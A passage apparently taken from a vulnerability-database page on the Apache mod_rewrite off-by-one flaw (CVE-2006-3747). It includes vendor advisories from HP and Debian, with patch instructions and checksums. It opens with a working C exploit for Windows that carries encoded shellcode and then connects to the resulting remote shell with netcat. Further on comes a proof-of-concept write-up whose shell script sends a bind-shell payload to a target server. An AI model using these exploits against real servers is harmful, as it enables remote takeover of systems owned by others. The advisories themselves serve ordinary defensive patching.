"\x4c\x4b\x39\x4f\x37\x30\x31\x6b\x6b\x33\x63\x71\x43\x42\x48\x54"
"\x42\x63\x30\x76\x71\x63\x6c\x4c\x49\x6d\x30\x52\x4a\x32\x30\x32"
"\x70\x36\x37\x59\x6f\x52\x75\x71\x34\x50\x53\x70\x57\x4b\x4f\x72"
"\x75\x44\x68\x61\x43\x62\x74\x33\x67\x59\x6f\x63\x65\x67\x50\x4c"
"\x49\x38\x47\x6d\x51\x5a\x4c\x53\x30\x36\x70\x53\x30\x33\x30\x4e"
"\x69\x4b\x53\x53\x5a\x43\x30\x72\x48\x53\x30\x34\x50\x33\x30\x33"
"\x30\x50\x53\x76\x37\x6b\x4f\x36\x35\x74\x58\x6e\x61\x4a\x4c\x67"
"\x70\x35\x54\x33\x30\x63\x30\x49\x6f\x78\x53\x41";


char finish[]= "HTTP/1.0\r\nHost: ";

char payload2[]=
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x18"
"\xd9\x03\x3a\x83\xeb\xfc\xe2\xf4\xe4\xb3\xe8\x77\xf0\x20\xfc\xc5"
"\xe7\xb9\x88\x56\x3c\xfd\x88\x7f\x24\x52\x7f\x3f\x60\xd8\xec\xb1"
"\x57\xc1\x88\x65\x38\xd8\xe8\x73\x93\xed\x88\x3b\xf6\xe8\xc3\xa3"
"\xb4\x5d\xc3\x4e\x1f\x18\xc9\x37\x19\x1b\xe8\xce\x23\x8d\x27\x12"
"\x6d\x3c\x88\x65\x3c\xd8\xe8\x5c\x93\xd5\x48\xb1\x47\xc5\x02\xd1"
"\x1b\xf5\x88\xb3\x74\xfd\x1f\x5b\xdb\xe8\xd8\x5e\x93\x9a\x33\xb1"
"\x58\xd5\x88\x4a\x04\x74\x88\x7a\x10\x87\x6b\xb4\x56\xd7\xef\x6a"
"\xe7\x0f\x65\x69\x7e\xb1\x30\x08\x70\xae\x70\x08\x47\x8d\xfc\xea"
"\x70\x12\xee\xc6\x23\x89\xfc\xec\x47\x50\xe6\x5c\x99\x34\x0b\x38"
"\x4d\xb3\x01\xc5\xc8\xb1\xda\x33\xed\x74\x54\xc5\xce\x8a\x50\x69"
"\x4b\x8a\x40\x69\x5b\x8a\xfc\xea\x7e\xb1\x12\x67\x7e\x8a\x8a\xdb"
"\x8d\xb1\xa7\x20\x68\x1e\x54\xc5\xce\xb3\x13\x6b\x4d\x26\xd3\x52"
"\xbc\x74\x2d\xd3\x4f\x26\xd5\x69\x4d\x26\xd3\x52\xfd\x90\x85\x73"
"\x4f\x26\xd5\x6a\x4c\x8d\x56\xc5\xc8\x4a\x6b\xdd\x61\x1f\x7a\x6d"
"\xe7\x0f\x56\xc5\xc8\xbf\x69\x5e\x7e\xb1\x60\x57\x91\x3c\x69\x6a"
"\x41\xf0\xcf\xb3\xff\xb3\x47\xb3\xfa\xe8\xc3\xc9\xb2\x27\x41\x17"
"\xe6\x9b\x2f\xa9\x95\xa3\x3b\x91\xb3\x72\x6b\x48\xe6\x6a\x15\xc5"
"\x6d\x9d\xfc\xec\x43\x8e\x51\x6b\x49\x88\x69\x3b\x49\x88\x56\x6b"
"\xe7\x09\x6b\x97\xc1\xdc\xcd\x69\xe7\x0f\x69\xc5\xe7\xee\xfc\xea"
"\x93\x8e\xff\xb9\xdc\xbd\xfc\xec\x4a\x26\xd3\x52\xe8\x53\x07\x65"
"\x4b\x26\xd5\xc5\xc8\xd9\x03\x3a";

int main(int argc, char *argv[])
{
    int sockfd, numbytes;  
    char buf[MAXDATASIZE];
    struct hostent *he;
    struct sockaddr_in their_addr;
    printf("  Exploit: apache mod rewrite exploit (win32)\n"
           "       By: fabio/b0x (oc-192, old CoTS member)\n"
           "Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard\n"
           );
    if (argc != 3) {
        printf("    Usage: ./apache hostname rewrite_path\n");
        exit(1);
    }
    printf("\n[+]Preparing payload\n");

    char payload[748];
    sprintf(payload,"GET /%s%s%s%s%s\r\n\r\n\0",argv[2],get,shellcode,finish,argv[1]);

    printf("[+]Connecting...\n");
    if ((he=gethostbyname(argv[1])) == NULL) {
        printf("[-]Cannot resolv hostname...\n");
        exit(1);
    }
    if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
        printf("[-]Socket error...\n");
        exit(1);
    }

    their_addr.sin_family = AF_INET;   
    their_addr.sin_port = htons(PORT);  
    their_addr.sin_addr = *((struct in_addr *)he->h_addr);
    memset(their_addr.sin_zero, '\0', sizeof their_addr.sin_zero);
    if (connect(sockfd, (struct sockaddr *)&their_addr,
                                          sizeof(struct sockaddr)) == -1) {
        printf("[-]Unable to connect\n");
        exit(1);
    }
   printf("[+]Connected\n[+]Sending...\n");
   if (send(sockfd, payload, strlen(payload), 0) == -1){
    printf("[-]Unable to send\n");
    exit(1);
   }
   printf("[+]Sent\n");
   close(sockfd);
   printf("[+]Starting second stage...\n");
   sleep(3);
    printf("[+]Connecting...\n");
    if ((he=gethostbyname(argv[1])) == NULL) { 
        printf("[-]Cannot resolv hostname...\n");
        exit(1);
    }
    if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
        printf("[-]Socket error...\n");
        exit(1);
    }

    their_addr.sin_family = AF_INET;   
    their_addr.sin_port = htons(PORT2);
    their_addr.sin_addr = *((struct in_addr *)he->h_addr);
    memset(their_addr.sin_zero, '\0', sizeof their_addr.sin_zero);
    if (connect(sockfd, (struct sockaddr *)&their_addr,
                                          sizeof(struct sockaddr)) == -1) {
        printf("[-]Unable to connect\n");
        exit(1);
    }
   printf("[+]Connected\n[+]Sending...\n");
   if (send(sockfd, payload2, strlen(payload2), 0) == -1){
    printf("[-]Unable to send\n");
    exit(1);
   }
   printf("[+]Sent\n[+]Connecting to shell\n");
   close(sockfd);


   sleep(3);
   int exec;
   char what[1024];
   sprintf(what," nc -w 10 %s 4445",argv[1]);
   exec=system(what);
   if (exec!=0){
    printf("[-]Not hacked\n");
   } else {
    printf("[+]Owned\n");
   }
   exit(1);
} 

    

- 漏洞信息 (F49766)

HP Security Bulletin 2006-12.2 (PacketStormID:F49766)
2006-09-07 00:00:00
Hewlett Packard,HP  hp.com
advisory,denial of service,arbitrary,vulnerability
hpux
CVE-2006-3747,CVE-2005-3352,CVE-2005-3357
[点击下载]

HP Security Bulletin - Potential security vulnerabilities have been identified with Apache running on HP-UX. These vulnerabilities could be exploited remotely to allow execution of arbitrary code, denial of service, or unauthorized access.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00760969

Version: 1

HPSBUX02145 SSRT061202 rev.1 - HP-UX running Apache Remote Execution of Arbitrary Code, 
Denial of Service (DoS), and Unauthorized Access

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2006-08-25
Last Updated: 2006-08-28

Potential Security Impact: Remote execution of arbitrary code, Denial of Service (DoS), 
and unauthorized access.

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with Apache running on HP-UX. 
These vulnerabilities could be exploited remotely to allow execution of arbitrary code, 
Denial of Service (DoS), or unauthorized access.

References: CVE-2006-3747, CVE-2005-3352, CVE-2005-3357

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.00, B.11.11, B.11.23 running Apache-based Web Server prior to v.2.0.58.

BACKGROUND

The following potential security vulnerabilities are resolved in the 
software update listed below:

CVE-2006-3747 (cve.mitre.org): Off-by-one error in the ldap scheme handling.
CVE-2005-3352 (cve.mitre.org): mod_ssl NULL pointer dereference.
CVE-2005-3357 (cve.mitre.org): Remote arbitrary code execution.

AFFECTED VERSIONS

For IPv4:
HP-UX B.11.00
HP-UX B.11.11
===========
hpuxwsAPACHE
action: install revision A.2.0.58.00 or subsequent
action: restart Apache

For IPv6:
HP-UX B.11.11
===========
hpuxwsAPACHE,revision=B.1.0.00.01
hpuxwsAPACHE,revision=B.1.0.07.01
hpuxwsAPACHE,revision=B.1.0.08.01
hpuxwsAPACHE,revision=B.1.0.09.01
hpuxwsAPACHE,revision=B.1.0.10.01
hpuxwsAPACHE,revision=B.2.0.48.00
hpuxwsAPACHE,revision=B.2.0.49.00
hpuxwsAPACHE,revision=B.2.0.50.00
hpuxwsAPACHE,revision=B.2.0.51.00
hpuxwsAPACHE,revision=B.2.0.52.00
hpuxwsAPACHE,revision=B.2.0.53.00
hpuxwsAPACHE,revision=B.2.0.54.00
hpuxwsAPACHE,revision=B.2.0.55.00
action: install revision B.2.0.58.00 or subsequent
action: restart Apache

HP-UX B.11.23
===========
hpuxwsAPACHE
action: install revision B.2.0.58.00 or subsequent
action: restart Apache

END AFFECTED VERSIONS

RESOLUTION

HP has made the following patches and software updates available to resolve the issue.

Software updates for the Apache-based Web Server are available from:

http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/
displayProductInfo.pl?productNumber=HPUXWSSUITE

HP-UX B.11.00, B.11.11 and HP-UX B.11.23 require the Apache-based Web Server 
v.2.0.58.00 or subsequent.

Apache Update Procedure

Check for Apache Installation
- ----------------------------
To determine if the Apache web server from HP is installed on your system, 
use Software Distributor's swlist command. All three revisions of the product 
may co-exist on a single system.
For example, the results of the command
swlist -l product | grep -i apache
hpuxwsAPACHE B.2.0.55.00 HP-UX Apache-based Web Server

Stop Apache
- -------------
Before updating, make sure to stop any previous Apache binary. Otherwise, 
the previous binary will continue running, preventing the new one from starting,
although the installation would be successful. After determining which Apache is 
installed, stop Apache with the following commands:
for hpuxwsAPACHE: /opt/hpws/apache[32]/bin/apachectl stop

Download and Install Apache
- ---------------------------
Download Apache from Software Depot:

http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/
displayProductInfo.pl?productNumber=HPUXWSSUITE

Verify successful download by comparing the cksum with the value 
specified on the installation web page.

Use SD to swinstall the depot.
Installation of this new revision of HP Apache over an existing HP Apache 
installation is supported, while installation over a non-HP Apache is NOT supported.

Removing Apache Installation
- ----------------------------
If you prefer to remove Apache from your system instead of installing a newer revision 
to resolve the security problem, use both Software Distributor's "swremove" command 
and also "rm -rf" the home location as specified in the rc.config.d file "HOME" variables.
%ls /etc/rc.config.d | \ grep apache hpapache2conf hpws_apache[32]conf

MANUAL ACTIONS: Yes - Update plus other actions
Install the revision of the product.

PRODUCT SPECIFIC INFORMATION
HP-UX Security Patch Check: Security Patch Check revision B.02.00 analyzes all 
HP-issued Security Bulletins to provide a subset of recommended actions that potentially 
affect a specific HP-UX system. For more information: http://software.hp.com/portal/swdepot/displayProductInfo.do?productNumber=B6834AA

HISTORY: rev.1 - 28 August 2006 Initial Release

Support: For further information, contact normal HP Services
support channel.

Report: To report a potential security vulnerability with any HP
supported product, send Email to: security-alert@hp.com.  It is
strongly recommended that security related information being
communicated to HP be encrypted using PGP, especially exploit
information.  To get the security-alert PGP key, please send an
e-mail message as follows:
  To: security-alert@hp.com
  Subject: get key

Subscribe: To initiate a subscription to receive future HP
Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&
langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC

On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
  - check ALL categories for which alerts are required and
    continue.
Under Step2: your ITRC operating systems
  - verify your operating system selections are checked and
    save.

To update an existing subscription:
http://h30046.www3.hp.com/subSignIn.php
Log in on the web page:
  Subscriber's choice for Business: sign-in.
On the web page:
  Subscriber's Choice: your profile summary
    - use Edit Profile to update appropriate sections.

To review previously published Security Bulletins visit:
http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin
relates to is represented by the 5th and 6th characters of the
Bulletin number in the title:

    GN = HP General SW,
    MA = HP Management Agents,
    MI = Misc. 3rd party SW,
    MP = HP MPE/iX,
    NS = HP NonStop Servers,
    OV = HP OpenVMS,
    PI = HP Printing & Imaging,
    ST = HP Storage SW,
    TL = HP Trusted Linux,
    TU = HP Tru64 UNIX,
    UX = HP-UX,
    VV = HP Virtual Vault


System management and security procedures must be reviewed
frequently to maintain system integrity. HP is continually
reviewing and enhancing the security features of software products
to provide customers with current secure solutions.

"HP is broadly distributing this Security Bulletin in order to
bring to the attention of users of the affected HP products the
important security information contained in this Bulletin. HP
recommends that all users determine the applicability of this
information to their individual situations and take appropriate
action. HP does not warrant that this information is necessarily
accurate or complete for all user situations and, consequently, HP
will not be responsible for any damages resulting from user's use
or disregard of the information provided in this Bulletin. To the
extent permitted by law, HP disclaims all warranties, either
express or implied, including the warranties of merchantability
and fitness for a particular purpose, title and non-infringement."


(c)Copyright 2006 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or
editorial errors or omissions contained herein. The information
provided is provided "as is" without warranty of any kind. To the
extent permitted by law, neither HP nor its affiliates,
subcontractors or suppliers will be liable for incidental, special
or consequential damages including downtime cost; lost profits;
damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration.
The information in this document is subject to change without
notice. Hewlett-Packard Company and the names of Hewlett-Packard
products referenced herein are trademarks of Hewlett-Packard
Company in the United States and other countries. Other product
and company names mentioned herein may be trademarks of their
respective owners.
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1

iQA/AwUBRP1TReAfOvwtKn1ZEQLT9ACfWII/AKKvj7mlAZjWvCuL5RR7WjkAn38R
t0wC8YEPUSa3cTZD5UhhZEiW
=30XB
-----END PGP SIGNATURE-----
    

- 漏洞信息 (F49400)

modrewritepoc.txt (PacketStormID:F49400)
2006-08-27 00:00:00
Jacobo Avariento Gimeno  
exploit,overflow,proof of concept
CVE-2006-3747
[点击下载]

Proof of concept exploit for the mod_rewrite vulnerability in Apache that makes use of an off by one overflow in the handling of ldap requests.

Public release date of POC/Exploit: 2006-08-20
Author: Jacobo Avariento Gimeno
CVE id: CVE-2006-3747
Bugtraq id: 19204
CERT advisory: VU#395412
Severity: high


Introduction
----
On July 28 2006 Mark Dowd (McAfee Avert Labs) reported a vulnerability
found in mod_rewrite apache module to the bugtraq mailing list.
The vulnerable function is escape_absolute_uri() and the problem only
could be arised when mod_rewrite is dealing with an LDAP URL, a
malformed LDAP URL could trigger an off-by-one overflow in certain
(special) situations and a possible attacker could cause a
denial-of-service or execute arbitrary code with the privileges of
the apache user.
To exploit this vulnerability isn't necessary an LDAP-specific rule,
but must have a rule which the user can control the inital part of the
remapped URL, i.e.: 

RewriteRule foo/(.*) $1

Any version of the Apache HTTP server:
 * 1.3 branch:  >1.3.28 and <1.3.37
 * 2.0 branch:  >2.0.46 and <2.0.59
 * 2.2 branch:  >2.2.0  and <2.2.3
is vulnerable.


Analysis of the vulnerable code
----

  2696  /* escape absolute uri, which may or may not be path oriented.
  2697   * So let's handle them differently.
  2698   */
  2699  static char *escape_absolute_uri(ap_pool *p, char *uri,
unsigned scheme) 
  2700  {
  2701      char *cp;
  2702  ...
  ...
  2727   /* special thing for ldap.
  2728    * The parts are separated by question marks. From RFC 2255: 
  2729    *     ldapurl = scheme "://" [hostport] ["/"
  2730    *               [dn ["?" [attributes] ["?" [scope]
  2731    *               ["?" [filter] ["?" extensions]]]]]]
  2732    */ 
  2733          if (!strncasecmp(uri, "ldap", 4)) {
  2734              char *token[5];
  2735              int c = 0;
  2736  
  2737              token[0] = cp = ap_pstrdup(p, cp);
  2738              while (*cp && c < 5) {
  2739                  if (*cp == '?') {
  2740                      token[++c] = cp + 1;
  2741                      *cp = '\0';
  2742                  }
  2743                  ++cp;
  2744              }

In the case that an LDAP URI contains a fifth '?' the line 2740 causes
an off-by-one overflow, it's writing in token[5].
To exploit this problem is necessary a vulnerable apache version and a
specific stack frame layout.

Proof of concept
----

To know if your apache vulnerable version could be successful
exploited, write this rule in your httpd.conf or .htaccess file:

RewriteRule kung/(.*) $1

And try to access to the following URL:
/kung/ldap://localhost/AAAAAAAAAAAAAAAAAAAAA%3FAAAAAAAAAAAAA%
3FAAAAAAAAAAAAAAA%3FAAAAAAAAAA%3FAAAAAAAAAA%3FBBBBBBBBBBBBBB

If your web server doesn't reply you with a '302 Found' page or a
Segmentation Fault appears in your error_log, an apache child has
crashed and your web server is vulnerable and exploitable.

Exploit
----

This exploit was successful executed on Apache 1.3.34, debian
sarge package:

#!/bin/sh
# Exploit for Apache mod_rewrite off-by-one.
# Vulnerability discovered by Mark Dowd.
# CVE-2006-3747
# 
# by jack <jack\x40gulcas\x2Eorg>
# 2006-08-20
#
# Thx to xuso for help me with the shellcode.
#
# I suppose that you've the "RewriteRule kung/(.*) $1" rule if not
# you must recalculate adressess.
#
# Shellcode is based on Taeho Oh bindshell on port 30464 and modified
# for avoiding apache url-escape.. Take a look is quite nice ;)
#
# Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at
# 0x0834ae77 for any other version/system find it.
#
# Gulcas rulez :P

echo -e "mod_rewrite apache off-by-one overflow\nby jack <jack\x40gulcas
\x2eorg>\n\n"

if [ $# -ne 1 ] ; then
  echo "Usage: $0 webserver"
  exit
fi

host=$1

echo -ne "GET /kung/ldap://localhost/`perl -e 'print "%90"x128'`%89%e6%
31%c0%31 %db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3%
01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04%
31%c0%89%46%10%b0%10%89%46%08% b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66%
b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31%
c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8%
23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76%
08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db%
cd %80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%
77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\nHost:
$host\r\n\r\n" | nc $host 80


More info is coming at http://ciberjacobo.com/sec/mod_rewrite.html


-- 
Jacobo Avariento Gimeno
http://ciberjacobo.com
OpenPGP key: http://ciberjacobo.com/key.pem
    

- 漏洞信息 (F48979)

Debian Linux Security Advisory 1132-1 (PacketStormID:F48979)
2006-08-17 00:00:00
Debian  debian.org
advisory,remote,web,overflow
linux,debian
CVE-2006-3747
[点击下载]

Debian Security Advisory 1132-1 - Mark Dowd discovered a buffer overflow in the mod_rewrite component of apache, a versatile high-performance HTTP server. In some situations a remote attacker could exploit this to execute arbitary code.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1132-1                    security@debian.org
http://www.debian.org/security/                                 Steve Kemp
Aug 1st, 2005                           http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : apache2
Vulnerability  : buffer overflow
Problem-Type   : remote
Debian-specific: no
CVE ID         : CVE-2006-3747
CERT advisory  : VU#395412
Debian Bug     : 380182

Mark Dowd discovered a buffer overflow in the mod_rewrite component of
apache, a versatile high-performance HTTP server.  In some situations a
remote attacker could exploit this to execute arbitary code.

For the stable distribution (sarge) this problem has been fixed in
version 2.0.54-5sarge1.

For the unstable distribution (sid) this problem will be fixed shortly.

We recommend that you upgrade your apache2 package.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1.dsc
      Size/MD5 checksum:     1153 4b2aeab1c5578a6879c1d036487c75a2
    http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1.diff.gz
      Size/MD5 checksum:   110080 57c824fbbbae3fa68d504797fa8e6341
    http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54.orig.tar.gz
      Size/MD5 checksum:  7493636 37d0d0a3e25ad93d37f0483021e70409

  Architecture independent components:

    http://security.debian.org/pool/updates/main/a/apache2/apache2-doc_2.0.54-5sarge1_all.deb
      Size/MD5 checksum:  3891046 f860e8207364bbbf05cfd81fa281508e
    http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-threadpool_2.0.54-5sarge1_all.deb
      Size/MD5 checksum:    33564 7d974c7e0f38c6e31017e712f15214fd

  Alpha architecture:

    http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1_alpha.deb
      Size/MD5 checksum:    33488 f36f397f92e8946d342d8b939a8e1f41
    http://security.debian.org/pool/updates/main/a/apache2/apache2-common_2.0.54-5sarge1_alpha.deb
      Size/MD5 checksum:   865320 82e919111eccc60ed021aa196cc3cb00
    http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-perchild_2.0.54-5sarge1_alpha.deb
      Size/MD5 checksum:   246374 e6d9e455161bad25b178992b109c9375
    http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-prefork_2.0.54-5sarge1_alpha.deb
      Size/MD5 checksum:   241488 80524503bc76924132c26df38c61e5ad
    http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-worker_2.0.54-5sarge1_alpha.deb
      Size/MD5 checksum:   245676 91eab40f8da34595f1a96c1b3c2254a3
    http://security.debian.org/pool/updates/main/a/apache2/apache2-prefork-dev_2.0.54-5sarge1_alpha.deb
      Size/MD5 checksum:   167694 81b924d7aca297e86e600a3439d31d4a
    http://security.debian.org/pool/updates/main/a/apache2/apache2-threaded-dev_2.0.54-5sarge1_alpha.deb
      Size/MD5 checksum:   168422 fa3bf3865b48d5a8324a6e6135ffaab1
    http://security.debian.org/pool/updates/main/a/apache2/apache2-utils_2.0.54-5sarge1_alpha.deb
      Size/MD5 checksum:    97552 67c989219009488916ba16f399fa33fb
    http://security.debian.org/pool/updates/main/a/apache2/libapr0_2.0.54-5sarge1_alpha.deb
      Size/MD5 checksum:   155792 ff3355874d8b7fa7c6ad1c55f8eabb8c
    http://security.debian.org/pool/updates/main/a/apache2/libapr0-dev_2.0.54-5sarge1_alpha.deb
      Size/MD5 checksum:   315260 ed3c2bc91b3be333c535aae01959f5f0

  AMD64 architecture:

    http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1_amd64.deb
      Size/MD5 checksum:    33482 431da06ae2973e4ab7e6195652b4f8b6
    http://security.debian.org/pool/updates/main/a/apache2/apache2-common_2.0.54-5sarge1_amd64.deb
      Size/MD5 checksum:   826686 3e2d13f95a82053ec6afa782ae62ffec
    http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-perchild_2.0.54-5sarge1_amd64.deb
      Size/MD5 checksum:   221350 7f3384834425befc9437ff16795fe827
    http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-prefork_2.0.54-5sarge1_amd64.deb
      Size/MD5 checksum:   216820 76034c08d148bf01b7eb72f5156fe2bc
    http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-worker_2.0.54-5sarge1_amd64.deb
      Size/MD5 checksum:   220588 382bd5f3a47262c68c72566ae45aa005
    http://security.debian.org/pool/updates/main/a/apache2/apache2-prefork-dev_2.0.54-5sarge1_amd64.deb
      Size/MD5 checksum:   167698 fb700ccba617ede30505a1a75f1528c1
    http://security.debian.org/pool/updates/main/a/apache2/apache2-threaded-dev_2.0.54-5sarge1_amd64.deb
      Size/MD5 checksum:   168438 d0dd58b34bf5bb543f2bf9971bc30f17
    http://security.debian.org/pool/updates/main/a/apache2/apache2-utils_2.0.54-5sarge1_amd64.deb
      Size/MD5 checksum:    92732 db6b4a3d3d2fa90a193c5d799b27161c
    http://security.debian.org/pool/updates/main/a/apache2/libapr0_2.0.54-5sarge1_amd64.deb
      Size/MD5 checksum:   137334 5318191c95c001866e475a9f8218a0d0
    http://security.debian.org/pool/updates/main/a/apache2/libapr0-dev_2.0.54-5sarge1_amd64.deb
      Size/MD5 checksum:   278836 fd2955649002a6d3c4b6de7c9f18c794

  ARM architecture:

    http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1_arm.deb
      Size/MD5 checksum:    33490 1584e54d81dbfc1d45f6208ad268903d
    http://security.debian.org/pool/updates/main/a/apache2/apache2-common_2.0.54-5sarge1_arm.deb
      Size/MD5 checksum:   793694 233ea0fad9d5531cdc20182474c583fc
    http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-perchild_2.0.54-5sarge1_arm.deb
      Size/MD5 checksum:   202316 8916fa2da9d7740f4b1ac22f498bd47d
    http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-prefork_2.0.54-5sarge1_arm.deb
      Size/MD5 checksum:   197954 bbaefcea762f1600f0ba330d79d63b5e
    http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-worker_2.0.54-5sarge1_arm.deb
      Size/MD5 checksum:   201344 c494ebb8a6662ebb777f9f615ea50579
    http://security.debian.org/pool/updates/main/a/apache2/apache2-prefork-dev_2.0.54-5sarge1_arm.deb
      Size/MD5 checksum:   167706 ac66b709dbf32ea62406dd9131727f4b
    http://security.debian.org/pool/updates/main/a/apache2/apache2-threaded-dev_2.0.54-5sarge1_arm.deb
      Size/MD5 checksum:   168440 bbb3c010fb98d9bc96da846cb57c1c80
    http://security.debian.org/pool/updates/main/a/apache2/apache2-utils_2.0.54-5sarge1_arm.deb
      Size/MD5 checksum:    92652 92ac8c180bd95c8fcb4fbcc173fd93f9
    http://security.debian.org/pool/updates/main/a/apache2/libapr0_2.0.54-5sarge1_arm.deb
      Size/MD5 checksum:   122384 4802054d8d5b2f25d5b4ed32f2bbcad2
    http://security.debian.org/pool/updates/main/a/apache2/libapr0-dev_2.0.54-5sarge1_arm.deb
      Size/MD5 checksum:   267920 02f1b191a308bdb9c4c9955a9a5170ea

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1_i386.deb
      Size/MD5 checksum:    33486 7234f5717dbcbb800e90949d63cc1ddc
    http://security.debian.org/pool/updates/main/a/apache2/apache2-common_2.0.54-5sarge1_i386.deb
      Size/MD5 checksum:   812294 87b7c53659af00252c76484d030b76dd
    http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-perchild_2.0.54-5sarge1_i386.deb
      Size/MD5 checksum:   206644 f27a272c1e7c8a64fe3099e81879afe5
    http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-prefork_2.0.54-5sarge1_i386.deb
      Size/MD5 checksum:   202834 e9c259b62700c20aa0a123aac7ef8468
    http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-worker_2.0.54-5sarge1_i386.deb
      Size/MD5 checksum:   206402 0b12002711a684dee34a6f158c08b008
    http://security.debian.org/pool/updates/main/a/apache2/apache2-prefork-dev_2.0.54-5sarge1_i386.deb
      Size/MD5 checksum:   168868 9905d2bd31aaf49cb4c522a7130fc53e
    http://security.debian.org/pool/updates/main/a/apache2/apache2-threaded-dev_2.0.54-5sarge1_i386.deb
      Size/MD5 checksum:   169670 6bdf51222903fb1af0a1950e8f02e7e6
    http://security.debian.org/pool/updates/main/a/apache2/apache2-utils_2.0.54-5sarge1_i386.deb
      Size/MD5 checksum:    90916 15031d3164bf986a7d321d67f6f872f7
    http://security.debian.org/pool/updates/main/a/apache2/libapr0_2.0.54-5sarge1_i386.deb
      Size/MD5 checksum:   130372 f3aa36ce42aca7c552630338b70c4147
    http://security.debian.org/pool/updates/main/a/apache2/libapr0-dev_2.0.54-5sarge1_i386.deb
      Size/MD5 checksum:   260374 ffbe645e8c6762205148f7aa8656a3c7

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1_ia64.deb
      Size/MD5 checksum:    33486 0cd1947abffb3793f6c0dc7690632573
    http://security.debian.org/pool/updates/main/a/apache2/apache2-common_2.0.54-5sarge1_ia64.deb
      Size/MD5 checksum:   973648 7522385d947774e00a2b0f9c8586cc11
    http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-perchild_2.0.54-5sarge1_ia64.deb
      Size/MD5 checksum:   289276 bace1a0298d9336892bedbdc708f35ec
    http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-prefork_2.0.54-5sarge1_ia64.deb
      Size/MD5 checksum:   281296 6495947c25e20f5459d44980378420f7
    http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-worker_2.0.54-5sarge1_ia64.deb
      Size/MD5 checksum:   287876 d63b895f7d31859642932ef11521120b
    http://security.debian.org/pool/updates/main/a/apache2/apache2-prefork-dev_2.0.54-5sarge1_ia64.deb
      Size/MD5 checksum:   167676 ae253a0de588b5f3c75cd0139c23b94e
    http://security.debian.org/pool/updates/main/a/apache2/apache2-threaded-dev_2.0.54-5sarge1_ia64.deb
      Size/MD5 checksum:   168418 b9a670874ff49ad8016ce34f65db75ca
    http://security.debian.org/pool/updates/main/a/apache2/apache2-utils_2.0.54-5sarge1_ia64.deb
      Size/MD5 checksum:   106404 02c8d485338f0f86e61769bedfd1195e
    http://security.debian.org/pool/updates/main/a/apache2/libapr0_2.0.54-5sarge1_ia64.deb
      Size/MD5 checksum:   177836 5f1d653818331006ad992b9f29fec1c3
    http://security.debian.org/pool/updates/main/a/apache2/libapr0-dev_2.0.54-5sarge1_ia64.deb
